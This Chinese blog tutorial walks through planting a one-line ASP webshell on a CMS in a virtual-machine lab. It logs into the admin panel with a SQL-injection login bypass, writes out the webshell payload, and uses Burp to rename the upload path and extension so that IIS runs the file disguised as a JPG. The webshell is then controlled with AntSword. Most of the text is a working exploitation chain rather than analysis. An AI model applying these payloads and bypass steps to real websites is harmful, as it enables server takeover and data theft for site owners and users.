首页 > 其他分享 >一句话木马——上传+绕过

一句话木马——上传+绕过

时间:2024-06-02 16:01:08浏览次数:9  
标签:asp bookpic 一句 jpg 木马 绕过 上传

前期准备

软件:burp,中国蚁剑
环境:酷维网站,VM虚拟机

具体操作

1.网站管理打开,进入bookpic目录(C:\Inetpub\cms\cms\bookpic),添加a.asp文件(一句话木马上传点)

image

2.调出属性,修改为IP,应用后确定

image

3.用物理机打开网站,进入admin目录,进入http://192.168.1.29/admin/Admin_Login.asp后台管理界面

使用万能密码 账号:admin 'or 1=1-- 密码:任意

进入后去添加公告里找上传点

image

4.打开burpsuit,配置一下proxy(switchy omega)


上传+绕过有两个方法

方法1

制作一句话木马图片(传前格式验证)

参考——创建一句话木马(图片马)_一句话图片码-CSDN博客

image

访问上传路径,上传成功

image

后台数据库也有显示

image

这里有点问题,jpg蚁剑连不了,要php格式的文件,连接失败

这种适合传前格式验证,上传后bp抓包改jpg后缀为php才能用蚁剑连接


方法2

burp绕过(传后格式验证)

制作1.asp一句话木马

文本输入<%eval request ("POST")%> 另存为

image

在1.asp文件里一句话木马前面多加一些文字信息——为了使文件容量变大,要不然网站识别不了

image

上传后抓包,修改文件路径为bookpic/a.asp/,再修改文件上传后缀为jpg,放行,拦截关闭

image

image

访问路径:IP/bookpic/a.asp/20246215171536061.jpg

image

没有显示php代码说明解析成功

image

中国蚁剑连接成功

image

image

标签:asp,bookpic,一句,jpg,木马,绕过,上传
From: https://blog.csdn.net/m0_75236662/article/details/139392764

相关文章

  • 一句话木马——上传+绕过
    前期准备软件:burp,中国蚁剑环境:酷维网站,VM虚拟机具体操作1.网站管理打开,进入bookpic目录(C:\Inetpub\cms\cms\bookpic),添加a.asp文件(一句话木马上传点)2.调出属性,修改为IP,应用后确定3.用物理机打开网站,进入admin目录,进入http://192.168.1.29/admin/Admin_Login.asp后台管理......
  • 内网渗透-在HTTP协议层面绕过WAF
    进入正题,随着安全意思增强,各企业对自己的网站也更加注重安全性。但很多web应用因为老旧,或贪图方便想以最小代价保证应用安全,就只仅仅给服务器安装waf。本次从协议层面绕过waf实验用sql注入演示,但不限于实际应用时测试sql注入(命令执行,代码执行,文件上传等测试都通用)。原理先给......
  • Harmonyos Next——图片上传与下载
    HarmonyosNext——图片上传与下载图片上传至服务器描述选取图片从相册选择图片通过拍摄获取图片将获取的图片上传至服务器拷贝文件上传图片图片下载图片上传至服务器描述从手机相册中选择一张图片,然后上传至服务器选取图片在从相册或者拍摄获取的图片之前,需要......
  • 企业微信接入系列-上传临时素材
    企业微信接入系列-上传临时素材文档介绍上传临时素材写在最后文档介绍创建企业群发的文档地址:https://developer.work.weixin.qq.com/document/path/92135,在创建企业群发消息或者群发群消息接口中涉及到上传临时素材的操作,具体文档地址:https://developer.work.weixin......
  • uniapp实现图片上传——支持APP、微信小程序
    uniapp实现图片、视频上传文章目录uniapp实现图片、视频上传效果图组件templatejs使用相关文档:结合uView插件+uni.uploadFile实现u-uploaduploadfile效果图组件简单封装,还有很多属性…,自定义样式等…根据个人所需调整template<template> <view>......
  • idea将代码上传到gitee上
    先将代码上传到git本地仓库中操作流程:如图注意项目介绍不能为空,随便写写就行这样就上传到了本地仓库之后在上传到gitee远程仓库中    gitee官网地址:Gitee-基于Git的代码托管和研发协作平台面向企业提供一站式研发管理解决方案,包括代码管理、项目管理、文......
  • 文件上传时各配置目录优先级详解
    Tomcat配置目录有以下两个1.spring.servlet.multipart.location:文件上传路径2.server.tomcat.basedir:配置Tomcat运行日志和临时文件的目录。如果生产中配置了这两个目录,当上传文件时,他们的优先级是?    当上传文件时,代码执行到Request类,在发现使用时spring.servlet.mult......
  • AJ-Report命令执行绕过
    engine.eval(validationRules);命令执行的修复方式:只对3个内部执行命令的类做了黑名单。Nashorn是Java8引入的JavaScript引擎,允许在js代码中调用java的类与方法。这里的类指的是项目中的所有类,不局限于JDK,相当于我们可以调用项目里的任意类的任意方法,并且参数都是完......
  • DeerOJ 的题目上传流程(以传统提交为例)
    前言在OJ上上传题目的话,你需要题目描述的模板(以markdown形式),测试数据等。在DeerOJ上,除了这些,还需要一些额外的操作配置。题目、数据准备以前年新生赛的9数为例,题目描述的md文件如下:上传的数据以nine为前缀,输入输出文件分别以in和out为后缀,序号从1开始(注意不是从0开始......
  • 文件上传绕过速查
    我这里就分为两种吧,一种是基于代码限制的,一种基于防火墙,其实总的来看两者差不多,都是检测文件合法性,但是两者区别开来,在实际应用中信息收集之后对于一个网站的防护措施有了了解后,能够更精准的选择上传绕过方式。(本篇都使用php一句话木马作为示例) 前端JS限制文件后缀限制只......